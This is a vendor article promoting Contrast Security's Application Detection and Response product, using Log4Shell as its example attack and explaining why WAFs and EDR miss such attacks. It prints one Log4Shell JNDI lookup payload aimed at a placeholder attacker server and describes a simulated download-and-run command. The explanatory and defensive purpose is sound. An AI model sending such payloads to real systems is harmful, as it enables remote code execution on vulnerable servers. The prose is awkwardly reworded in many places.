During this period of rapidly changing cyber danger setting, entities confront increasingly intricate assaults aimed at their applications. Grasping these risks and the technologies formulated to resist them is paramount. This piece plunges into the mechanisms of a standard application breach, utilizing the notorious Log4Shell vulnerability as a model, showcasing how Application Detection and Response (ADR) technology safeguards against such immediate vulnerabilities.
Read the Contrast ADR white paper
The framework of a contemporary application breach: Log4Shell
To depict the intricacy and seriousness of modern application breaches, let’s inspect a breach targeting the infamous Log4Shell vulnerability (CVE-2021-44228) that rattled the cybersecurity domain in late 2021. This onslaught epitomizes assault chaining, exploiting JNDI Injection, Expression Language (EL) Injection, and Command Injection.
Technical insight: The CVE program records, which publicly unveil computer security defects, are upheld by MITRE. Each CVE listing possesses a distinct identifier, making it simpler for IT professionals to exchange information about vulnerabilities across various security tools and services.
Phase 1: Utilization of the weakness
The Log4Shell flaw impacts Log4j, an omnipresent Java logging framework. The breach commences when a malevolent actor dispatches a skillfully crafted appeal to a susceptible application. This appeal incorporates a Java Naming and Directory Interface (JNDI) search string in a design like this:
${jndi:ldap://attacker-controlled-server.com/payload}
Technical insight: JNDI (Java Naming and Directory Interface) acts as a Java API that grants naming and directory functions to Java applications. It sanctions Java applications to identify and look up data and objects through a name, which could be exploited in specific vulnerabilities like Log4Shell. In this scenario, it’s exploited to initiate a bond with a malicious server.
Phase 2: JNDI hunt and EL assessment
As the vulnerable Log4j version processes this string, it construes the JNDI expression segment as an expression to be appraised. This evaluation prompts the application to conduct a JNDI hunt, stretching out to the assailant-controlled Lightweight Directory Access Protocol (LDAP) server stipulated in the string.
Technical insight: Log4j represents a prevalent Java-based logging framework devised by Apache. It’s substantially employed in Java applications for logging an array of data and occurrences.
Phase 3: Sinister payload retrieval
The hacker’s LDAP server retorts with an EL injection payload. Due to the attributes of JNDI and how Log4j interprets the reaction, this payload is seen as an EL expression to be appraised.
Phase 4: EL infraction
The EL expression frequently comprises malevolent code crafted to exploit the EL interpreter. This could encompass instructions to download and implement supplementary malware, transmit data surreptitiously, or instate an entryway in the system.
Technical insight: Expression Language (EL) functions as a scripting language permitting access to application data. EL injection arises when an aggressor can maneuver or inject malevolent EL expressions, potentially leading to code execution. EL injection vulnerabilities recur among immediate vulnerabilities, either directly or indirectly through chained assaults as illustrated here.
Phase 5: Code dispatch
As the EL interpreter appraises the injected expression, it triggers the malevolent code within the context of the defenseless application. This grants the assailant a platform into the system, frequently with the identical privileges as the application itself.
The influence and hazard of Log4Shell
What renders the Log4Shell vulnerability exceedingly severe is the extensive utilization of the Log4j library and how straightforward it was to exploit the flaw. It adjoins these apprehensions:
- Broad assault expanse: Log4j finds utility in numerous Java applications and frameworks, engendering this variety of vulnerability.
- Remote code execution: The correlated JNDI injection can promptly lead to remote code execution (RCE), granting assailants considerable sway over the susceptible system.
- Hard to discern: Breaches against the Log4Shell vulnerability might be obscured, making them arduous to detect through straightforward pattern matching of network-level precautions.
- Chained assaults: The JNDI injection assault can be linked with alternative tactics, such as EL injection and Command Injection, to engender more elaborate offenses.
This delineation of the Log4Shell assault highlights why application stratum offensives are so formidable and why protective mechanisms like Application Detection and Response (ADR) — elaborated on at length below — are critical for uncovering and thwarting such elaborate assaults.
Witness how to eradicate your application blindspot with Contrast ADR (video)
From platform to action on agendas
With primary access established, assailants can exploit this stance to utilize supplementary approaches to fulfill other objectives, such as:
- Privilege escalation: The attacker could exploit local vulnerabilitiesto acquire greater privileges on the infiltrated system.
- Scouting: Leveraging their heightened access, the intruder can explore the internal network for other susceptible systems or valuable information.
- Credential collection: The infiltrated system could be utilized to gather login details stored in memory or configuration files.
- Transition to alternative systems: By utilizing collected credentials or exploiting other vulnerabilities, the attacker can infiltrate additional systems within the network.
- Information extraction or ransomware deployment: Depending on their aims, attackers may pilfer confidential data or implement ransomware throughout the infiltrated network.
The constraints of current security methodologies
Before delving into ADR specifics, it is essential to grasp how it tackles a substantial void in many organizations’ security tactics: the deficiency of strong application-level threat identification.
Web application firewalls (WAFs)
Many organizations depend on WAFs as their primary shield against application-level threats. Nevertheless, this method encounters several crucial impediments:
- Network-centric focus: WAFs function at the network level, examining incoming traffic patterns to discern potential threats. While this can be effectual against recognized attack patterns, it offers limited insight into what unfolds within the application itself.
- False alarms: Because of their absence of application-specific context, WAFs frequently generate a high volume of false alarms. This can inundate security teams and result in alert overloads.
- Susceptibility to evasion methods: WAF evasion methods are remarkably simple to execute. Attackers can frequently skirt WAF protections using tactics like encoding variations, protocol-level evasion, or payload padding.
- Inefficient SOC assimilation: Even if organizations have WAFs in place, they often fall short in configuring them to furnish detailed application-level data to their security operations center (SOC).
Technology note: A WAF is a security tool that monitors, filters, and blocks HTTP traffic to and from a web application. It operates at the network level and is intended to aid in safeguarding web applications from various attacks, such as Cross-Site Scripting (XSS) and SQL injection.
Technology note: WAF evasions are techniques assailants employ to render WAF security controls ineffectual. These encompass methods to sneak malicious payloads past the WAF’s signature-based safeguards, or complete bypass of the WAF entry point to the application. It is imperative to have a defense-in-depth strategy concerning AppSec and not rely on a singular control to assure the security of the application layer.
Endpoint Detection and Response (EDR)
EDR solutions concentrate on observing and shielding individual endpoints within an organization. While pivotal for overall security, EDR presents its own set of limitations concerning application security:
- Concentration on endpoint actions: EDR predominantly observes system-level events and processes, not application-specific behaviors.
- Restricted insight into application internals: EDR solutions lack visibility into the internal functioning of applications.
- Reactive disposition: EDR frequently detects threats post their execution on an endpoint.
- Shortcomings in cloud and web application coverage: As applications migrate to cloud-based services, traditional EDR solutions may exhibit gaps.
Technology note: EDR is a cybersecurity technology that continually observes and responds to threats on endpoint devices like computers, laptops, and mobile gadgets. EDR solutions gather and analyze data from endpoints to empower security operations teams to detect, explore, and mitigate suspicious activities and potential security breaches. They usually provide real-time visibility, threat detection, and automated response capabilities, focusing on endpoint-level actions rather than application-specific behaviors.
The ADR benefit
ADR technology tackles these limitations by operating within the application itself. This approach presents several vital advantages:
- In-depth application insight: ADR offers insight into code execution and data flow, providing a level of visibility that network-level solutions simply cannot rival.
- Context-conscious detection: Through understanding the application’s behavior, ADR can more precisely differentiate between legitimate actions and authentic threats, substantially reducing false alarms.
- Zero-day vulnerability defense: ADR’s profound application insight permits it to detect and counteract novel attack patterns, offering better protection against zero-day vulnerabilities.
- Layered defense for WAF evasion: ADR functions as a crucial second line of defense, proficient in detecting threats that have effectively bypassed WAF protections.
- Comprehensive, actionable intelligence: ADR can furnish detailed, context-rich data about application-level threats directly to SOC teams, bridging the visibility gap and allowing more effective threat response.
- By executing ADR, organizations can bridge this critical void in their security stance, acquiring the capability to detect and respond to sophisticated application-level threats that prevailing solutions might overlook.
Technology note: ADR is a security approach that focuses on detecting and responding to threats at the application level. Unlike other AppSec measures that operate at the network level, ADR operates within the application itself, providing deeper visibility into application behavior and more accurate threat detection.
Technology note: A zero-day vulnerability is a software securityfault that is unidentified to the software vendor and has yet to be fixed. These weaknesses can be taken advantage of by malicious actors before the vendor catches on and rushes to address them.
Comparison of ADR in operation
Contrast Security utilizes cutting-edge ADR technology to identify and stop attacks like Log4Shell at various points. Let’s delve into the framework that enables this and explore its practical implications.
Architecture of Contrast ADR
Contrast ADR utilizes a framework based on agents, directly integrating with the application’s runtime:
- Agent deployment: Placing a lightweight agent within the application’s runtime environment (e.g., Java Virtual Machine [JVM] for Java applications).
- Runtime integration: Seamlessly integrating with the application code, enabling monitoring and analysis of application behavior in real-time.
- Instrumentation: Using instrumentation methods to observe code execution, data flow, and API calls without altering the application’s source code.
- Response mechanism: Promptly taking action upon detecting a threat, such as blocking malicious activities or informing security teams.
Protection in stages against Log4Shell
Step 1: Detection of JNDI injection
By enhancing the JVM’s security configurations, Contrast Runtime Security can detect the unauthorized JNDI lookup attempt.
Step 2: Detection of EL injection
Contrast Runtime Security can identify attempts at EL injection and prevent them by enhancing the JVM’s security settings to counter misuse of the JVM’s EL processor capabilities.
Stage 3: Prevention of code execution
In the rare scenario of loading malicious code, the Contrast Runtime Security Platform utilizes:
- Prevention of command injection: Applying classification, tracing, and semantic analysis techniques to stop attacker payloads from reaching critical APIs.
- Strengthening of processes: Improving the JVM’s security configurations to prevent misuse of JVM’s sensitive APIs related to command execution.
Practical example: Detection and analysis of Log4Shell attack
To gain a better understanding of how Contrast’s ADR technology functions in reality, let’s analyze a set of incidents from a simulated Log4Shell attack detection.
Note: For this illustration to showcase attacker exploit chaining and Contrast’s ADR’s defense-in-depth detection abilities, all behavioral rules are set to MONITOR mode, not BLOCK mode. Ordinarily, these rules would be in BLOCK mode, stopping and preventing the initial JNDI exploit and subsequence events.
- Detection of JNDI injection: Contrast ADR spots a JNDI injection attempt, recognizing an endeavor to redirect an InitialContext lookup to an LDAP server controlled by the attacker.
- Detection of EL injection: ADR identifies an EL injection event where an evaluated expression uses Java class loading to load the JavaScript engine embedded in the JVM. The payload leverages JavaScript to create a malicious array aimed at executing system commands.
- Detection of command injection: Contrast ADR identifies a command injection event where the command tries to download and run a shell script from a server controlled by the attacker.
This detailed breakdown illustrates Contrast ADR’s capacity to:
- Recognize the initial JNDI injection attempt
- Monitor the attack through various execution phases
- Spot and analyze malicious payloads
- Offer deep insight into the attack sequence, from the initial exploit to potential code execution
This level of understanding is crucial for preventing attacks and comprehending new threat trends.
Response of ADR to Log4Shell attack
Upon detecting a potential exploitation attempt of Log4Shell, Contrast ADR initiates a comprehensive response aligned with the NIST Cybersecurity Framework:
Recognition
- Utilizes Software Composition Analysis (SCA) at runtime to continuously map and inventory the application environment, detecting vulnerable Log4j instances.
- Provides real-time insight into the application’s behavior and data flow during the attack attempt.
Defense
- If in blocking
- The mode chosen blocks the initial JNDI search to the malicious server.
- By enhancing JVM security configurations to restrict JNDI capabilities, the attack surface is reduced.
Detection
- Recognizes and provides alerts for JNDI search attempts towards the malicious LDAP server.
- Detects efforts to execute harmful EL payloads.
- Keeps watch for unauthorized loading and execution of Java classes.
- Pinpoints suspicious process executions that may point to command injection.
Response
- Initiates the utilization of pre-defined run books for Log4Shell incidents.
- Delivers enhanced triaging context, which incorporates in-depth analysis of the attack chain and impacted application elements.
- Integrates seamlessly with SIEM/XDR/SOAR systems, enriching alerts with layer-specific details for improved incident scrutiny.
Technology Note: SIEM (Security Information and Event Management) refers to a system that gathers and evaluates log data from multiple sources within an organization’s IT structure. It aids in real-time assessment of security alarms generated by applications and network equipment. Examples of SIEM platforms are Splunk, QRadar, and Microsoft Sentinel.
Technology Note: XDR (Extended Detection and Response) is an inclusive security strategy that gathers and correlates data across numerous security layers — including email, endpoints, servers, cloud workloads, and networks. It leverages analytics to identify threats and respond automatically, delivering a more comprehensive and efficient way to detect, investigate, and address cybersecurity incidents throughout the entire IT ecosystem.
Recovery
- Assists in incident investigation by furnishing detailed forensic details of the attack attempt.
- Helps in determining the complete scope of potential compromise across the application range.
- Eases post-incident analysis to enhance detection and safeguarding capabilities.
- Offers data to assist in root cause analysis, aiding in averting similar incidents in the future.
Throughout this process, the ADR system sustains continuous monitoring, supplies real-time updates to security dashboards, and supports compliance reporting by logging all detection and response actions performed.
ADR integration with SIEM/SOAR/XDR ecosystem
The fusion of ADR technology with existing Security Information and Event Management (SIEM); security orchestration, automation, and response (SOAR); and Extended Detection and Response (XDR) systems establishes a potent collaboration that bolsters overall security operations. Here’s how ADR can harmonize and amplify SIEM/SOAR/XDR-driven workflows:
- Advanced incident response and analysis: ADR-triggered alerts are linked with network-related events in SIEM/SOAR/XDR, delivering a complete outlook of possible attacks and enabling more efficient root cause analysis.
- Dynamic security management: SIEM/SOAR/XDR can dynamically switch ADR to blocking mode, implement virtual patches, and activate enhanced logging.
- Unified threat containment: SIEM/SOAR/XDR synchronize in blocking malevolent IP addresses and leverage ADR’s application-specific context for effective response strategies.
- Smooth security-development cooperation: ADR generates vulnerability summaries and integrates with ticketing systems, streamlining communication between security and development teams.
By intertwining ADR with the SIEM/SOAR/XDR ecosystem, organizations achieve more thorough threat detection, quicker incident response, and more successful vulnerability management, considerably improving their overall security stance.
Business advantages of ADR technology
Deploying Contrast’s ADR technology results in tangible business benefits:
- Decreased vulnerability: By providing multi-layered, context-sensitive defense, ADR significantly lessens the susceptibility to successful attacks, safeguarding your organization’s data and reputation.
- Reduced overall ownership expenses: With fewer false alerts and automated protection, security teams can concentrate on high-priority matters, decreasing operational expenses.
- Enhanced compliance status: ADR’s extensive protection and meticulous logging aid in fulfilling various compliance stipulations, such as PCI DSS and GDPR.
- Accelerated time-to-market: By fortifying applications from within, ADR empowers development groups to progress swiftly without compromising on security, aligning with Secure by Design principles.
- Improved visibility: The profound insights offered by ADR technology bolster overall security readiness and inform strategic security decisions.
Note: PCI DSS (Payment Card Industry Data Security Standard) comprises a set of security directives aimed at ensuring secure environments for companies handling credit card information.
Note: GDPR (General Data Protection Regulation) is a legislative framework concerning data protection and privacy within the EU and EEA regions. It also addresses the transfer of personal data outside the EU and EEA territories.
Conclusion
As cyber threats evolve, solely relying on network-based application security measures is inadequate for safeguarding crucial applications and data. Contrast’s ADR technology presents a robust, intelligent, and proactive stance on application security.
By grasping the essence of contemporary attacks and leveraging state-of-the-art ADR solutions, organizations can vastly enrich their security stance, mitigate risks, and stay abreast of emerging threats. For security decision-makers, investing in ADR technology is not just a security measure but a strategic necessity to protect their organization’s digital assets in today’s threat landscape.
Next steps
To delve deeper into how ADR technology can fortify your organization’s security and witness its capabilities firsthand, request a demo of Contrast ADR.
By undertaking these steps, you’ll be on the path to enhancing your application security and staying ahead of evolving cyber threats.
Note: This article is written by Jonathan Harper, Principal Solutions Engineer at Contrast Security, boasting over five years of experience in application security. Jonathan has supported large enterprises and held previous roles at Threat Stack, Veracode, and Micron Technology.
Found this article intriguing? This article is a contributed piece from one of our esteemed partners. Stay updated with more exclusive content by following us on Twitter and LinkedIn.About Author
